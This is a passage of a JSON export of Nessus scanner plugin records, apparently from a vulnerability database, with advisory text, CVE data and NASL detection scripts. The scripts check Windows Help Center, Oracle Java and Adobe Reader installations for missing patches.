into\naccessing a malicious web page 
containing specially crafted 'hcp://'\nURLs, an as-yet unpatched vulnerability in Windows Help and Support\nCenter that arises due to its failure to validate URLs that use the\nHCP protocol could be leveraged to execute arbitrary code on the host\nsubject to the user's privileges.", "edition": 24, "published": "2010-06-18T00:00:00", "title": "MS KB2219475: Windows Help Center hcp:// Protocol Handler Arbitrary Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2265", "CVE-2010-1885"], "modified": "2010-06-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB_2219475.NASL", "href": "https://www.tenable.com/plugins/nessus/47045", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(47045);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/05\");\n\n script_cve_id(\"CVE-2010-1885\", \"CVE-2010-2265\");\n script_bugtraq_id(40721, 40725);\n script_xref(name:\"CERT\", value:\"578319\");\n script_xref(name:\"IAVA\", value:\"2010-A-0095-S\");\n script_xref(name:\"MSFT\", value:\"MS10-042\");\n script_xref(name:\"MSKB\", value:\"2219475\");\n\n script_name(english:\"MS KB2219475: Windows Help Center hcp:// Protocol Handler Arbitrary Code Execution\");\n script_summary(english:\"Checks whether the hcp protocol has been unregistered\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It may be possible to execute arbitrary code on the remote host using\nWindows Help and Support Center.\");\n script_set_attribute(attribute:\"description\", value:\n\"If a remote attacker can trick a user on the affected host into\naccessing a malicious web page containing specially crafted 'hcp://'\nURLs, an as-yet unpatched vulnerability in Windows Help and Support\nCenter that arises due to its failure to validate URLs that use the\nHCP protocol could be leveraged to execute arbitrary code on the host\nsubject 
to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2010/Jun/205\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2010/2219475\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?1bd7b338\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-042\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?da3bd311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply MS10-042 or consider unregistering the HCP protocol as a\nworkaround.\n\nNote, though, that applying the workaround will break local,\nlegitimate help links that use 'hcp://'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Help Center XSS and Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"smb_nt_ms10-042.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/Missing/MS10-042\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"audit.inc\");\n\n\nif (!get_kb_item('SMB/WindowsVersion')) exit(1, \"The 'SMB/WindowsVersion' KB item is missing.\");\nif (hotfix_check_sp(xp:4, win2003:3) <= 0) exit(0, \"The host is not affected based on its version / service pack.\");\nif (!get_kb_item(\"SMB/Missing/MS10-042\")) exit(0, \"The host is not affected because the 'SMB/Missing/MS10-042' KB item is missing.\");\n\n\n# Connect to the appropriate share.\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nif(! 
smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to IPC$ share.\");\n}\n\nhkcr = RegConnectRegistry(hkey:HKEY_CLASS_ROOT);\nif (isnull(hkcr))\n{\n NetUseDel();\n exit(1, \"Can't connect to remote registry.\");\n}\n\n\nhcp_installed = FALSE;\nhcp_label = \"\";\nhcp_handler = \"\";\n\nkey = \"HCP\";\nkey_h = RegOpenKey(handle:hkcr, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n # nb: per <http://msdn.microsoft.com/en-us/library/aa767914%28VS.85%29.aspx>,\n # the \"URL Protocol\" string must be present.\n value = RegQueryValue(handle:key_h, item:\"URL Protocol\");\n if (!isnull(value))\n {\n hcp_installed = TRUE;\n\n value = RegQueryValue(handle:key_h, item:NULL);\n if (!isnull(value)) hcp_label = value[1];\n\n key2 = key + \"\\shell\\open\\command\";\n key2_h = RegOpenKey(handle:hkcr, key:key2, mode:MAXIMUM_ALLOWED);\n if (!isnull(key2_h))\n {\n value = RegQueryValue(handle:key2_h, item:NULL);\n if (!isnull(value)) hcp_handler = value[1];\n\n RegCloseKey(handle:key2_h);\n }\n }\n\n RegCloseKey(handle:key_h);\n}\nRegCloseKey(handle:hkcr);\nNetUseDel();\n\n\nif (hcp_installed)\n{\n if (hcp_handler)\n {\n if (report_verbosity > 0)\n {\n if (!hcp_label) hcp_label = 'n/a';\n\n report = '\\n Label : ' + hcp_label +\n '\\n Handler : ' + hcp_handler + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n else exit(0, \"The HCP protocol handler has been unregistered.\");\n}\nelse exit(0, \"The HCP protocol handler has been deleted.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T04:56:03", "description": "The version of Oracle (formerly Sun) Java Runtime Environment (JRE)\ninstalled on the remote host is earlier than 6 Update 20. 
Such\nversions are potentially missing critical security updates.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2010-04-15T00:00:00", "title": "Oracle Java JDK / JRE 6 < Update 20 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0886", "CVE-2010-0887", "CVE-2010-1423"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:oracle:jre"], "id": "ORACLE_JAVA6_UPDATE20.NASL", "href": "https://www.tenable.com/plugins/nessus/45544", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(45544);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/17 12:00:07\");\n\n script_cve_id(\"CVE-2010-0886\", \"CVE-2010-0887\", \"CVE-2010-1423\");\n script_bugtraq_id(39346, 39492);\n\n script_name(english:\"Oracle Java JDK / JRE 6 < Update 20 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of the JRE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a runtime environment that is affected by\nmultiple vulnerabilities.\");\n\n script_set_attribute(attribute:\"description\", value:\n\n\"The version of Oracle (formerly Sun) Java Runtime Environment (JRE)\ninstalled on the remote host is earlier than 6 Update 20. 
Such\nversions are potentially missing critical security updates.\");\n \n # http://www.oracle.com/technetwork/topics/security/whatsnew/index.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?559335b7\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.oracle.com/technetwork/java/javase/6u20-142805.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 6 Update 20 or later and remove if necessary any\naffected versions.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Web Start Plugin Command Line Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/15\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sun_java_jre_installed.nasl\");\n 
script_require_keys(\"SMB/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list(\"SMB/Java/JRE/*\");\nif (isnull(installs)) exit(1, \"The 'SMB/Java/JRE/' KB item is missing.\");\n\ninfo=\"\";\nvuln = 0;\ninstalled_versions = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"SMB/Java/JRE/\";\n if (ver =~ \"^[0-9.]+\")\n installed_versions = installed_versions + \" & \" + ver;\n if (ver =~ \"^1\\.6\\.0_([01][0-9])([^0-9]|$)\")\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.6.0_20\\n';\n }\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n installed_versions = substr(installed_versions, 3);\n if (\" & \" >< installed_versions)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T04:56:04", "description": "The version of Oracle (formerly Sun) Java Runtime Environment (JRE)\ninstalled on the remote host is earlier than 6 Update 20. 
Such versions\nare potentially missing critical security updates.\n\nAs a result, the remote host could be affected by multiple\nvulnerabilities.", "edition": 27, "published": "2013-02-22T00:00:00", "title": "Oracle Java JDK / JRE 6 < Update 20 Multiple Vulnerabilities (Unix)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0886", "CVE-2010-0887", "CVE-2010-1423"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:oracle:jre"], "id": "ORACLE_JAVA6_UPDATE20_UNIX.NASL", "href": "https://www.tenable.com/plugins/nessus/64837", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64837);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/16 14:09:13\");\n\n script_cve_id(\"CVE-2010-0886\", \"CVE-2010-0887\", \"CVE-2010-1423\");\n script_bugtraq_id(39346, 39492);\n\n script_name(english:\"Oracle Java JDK / JRE 6 < Update 20 Multiple Vulnerabilities (Unix)\");\n script_summary(english:\"Checks version of the JRE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a runtime environment that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java Runtime Environment (JRE)\ninstalled on the remote host is earlier than 6 Update 20. 
Such versions\nare potentially missing critical security updates.\n\nAs a result, the remote host could be affected by multiple\nvulnerabilities.\");\n # http://www.oracle.com/technetwork/topics/security/whatsnew/index.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?559335b7\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.oracle.com/technetwork/java/javase/6u20-142805.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 6 Update 20 or later and remove if necessary any\naffected versions.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Web Start Plugin Command Line Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/22\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sun_java_jre_installed_unix.nasl\");\n 
script_require_keys(\"Host/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"Host/Java/JRE/Unmanaged/*\");\n\ninfo=\"\";\nvuln = 0;\nvuln2 = 0;\ninstalled_versions = \"\";\ngranular = \"\";\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"Host/Java/JRE/Unmanaged/\";\n if (ver !~ \"^[0-9.]+\") continue;\n installed_versions = installed_versions + \" & \" + ver;\n if (ver =~ \"^1\\.6\\.0_([01][0-9])([^0-9]|$)\")\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.6.0_20\\n';\n }\n else if (ver =~ \"^[\\d\\.]+$\")\n {\n dirs = make_list(get_kb_list(install));\n foreach dir (dirs)\n granular += \"The Oracle Java version \"+ver+\" at \"+dir+\" is not granular enough to make a determination.\"+'\\n';\n }\n else\n {\n dirs = make_list(get_kb_list(install));\n vuln2 += max_index(dirs);\n }\n\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n if (granular) exit(0, granular);\n}\nelse\n{\n if (granular) exit(0, granular);\n installed_versions = substr(installed_versions, 3);\n if (vuln2 > 1)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:30", "description": "The remote host is affected by the vulnerability described 
in GLSA-200904-17\n(Adobe Reader: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been discovered in Adobe Reader:\n Alin Rad Pop of Secunia Research reported a heap-based buffer overflow\n when processing PDF files containing a malformed JBIG2 symbol\n dictionary segment (CVE-2009-0193).\n A buffer overflow related to a non-JavaScript function call and\n possibly an embedded JBIG2 image stream has been reported\n (CVE-2009-0658).\n Tenable Network Security reported a stack-based buffer overflow that\n can be triggered via a crafted argument to the getIcon() method of a\n Collab object (CVE-2009-0927).\n Sean Larsson of iDefense Labs reported a heap-based buffer overflow\n when processing a PDF file containing a JBIG2 stream with a size\n inconsistency related to an unspecified table (CVE-2009-0928).\n Jonathan Brossard of the iViZ Security Research Team reported an\n unspecified vulnerability related to JBIG2 and input validation\n (CVE-2009-1061).\n Will Dormann of CERT/CC reported a vulnerability lading to memory\n corruption related to JBIG2 (CVE-2009-1062).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted PDF\n document, possibly leading to the execution of arbitrary code with the\n privileges of the user running the application, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2009-04-21T00:00:00", "title": "GLSA-200904-17 : Adobe Reader: User-assisted execution of arbitrary code", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "modified": "2009-04-21T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:acroread"], "id": "GENTOO_GLSA-200904-17.NASL", "href": "https://www.tenable.com/plugins/nessus/36196", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive 
text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200904-17.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36196);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_bugtraq_id(33751, 34169, 34229);\n script_xref(name:\"GLSA\", value:\"200904-17\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"GLSA-200904-17 : Adobe Reader: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200904-17\n(Adobe Reader: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been discovered in Adobe Reader:\n Alin Rad Pop of Secunia Research reported a heap-based buffer overflow\n when processing PDF files containing a malformed JBIG2 symbol\n dictionary segment (CVE-2009-0193).\n A buffer overflow related to a non-JavaScript function call and\n possibly an embedded JBIG2 image stream has been reported\n (CVE-2009-0658).\n Tenable Network Security reported a stack-based buffer overflow that\n can be triggered via a crafted argument to the getIcon() method of a\n Collab object (CVE-2009-0927).\n Sean Larsson of iDefense Labs reported a heap-based buffer overflow\n when processing a 
PDF file containing a JBIG2 stream with a size\n inconsistency related to an unspecified table (CVE-2009-0928).\n Jonathan Brossard of the iViZ Security Research Team reported an\n unspecified vulnerability related to JBIG2 and input validation\n (CVE-2009-1061).\n Will Dormann of CERT/CC reported a vulnerability lading to memory\n corruption related to JBIG2 (CVE-2009-1062).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted PDF\n document, possibly leading to the execution of arbitrary code with the\n privileges of the user running the application, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200904-17\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Reader users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-8.1.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/acroread\", unaffected:make_list(\"ge 8.1.4\"), vulnerable:make_list(\"lt 8.1.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Reader\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:04", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)", "edition": 24, "published": "2009-07-21T00:00:00", 
"title": "openSUSE Security Update : acroread (acroread-689)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "modified": "2009-07-21T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:acroread"], "id": "SUSE_11_1_ACROREAD-090325.NASL", "href": "https://www.tenable.com/plugins/nessus/40182", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-689.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40182);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-689)\");\n script_summary(english:\"Check for the acroread-689 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=488619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n 
script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ 
\"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-8.1.4-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:59", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, 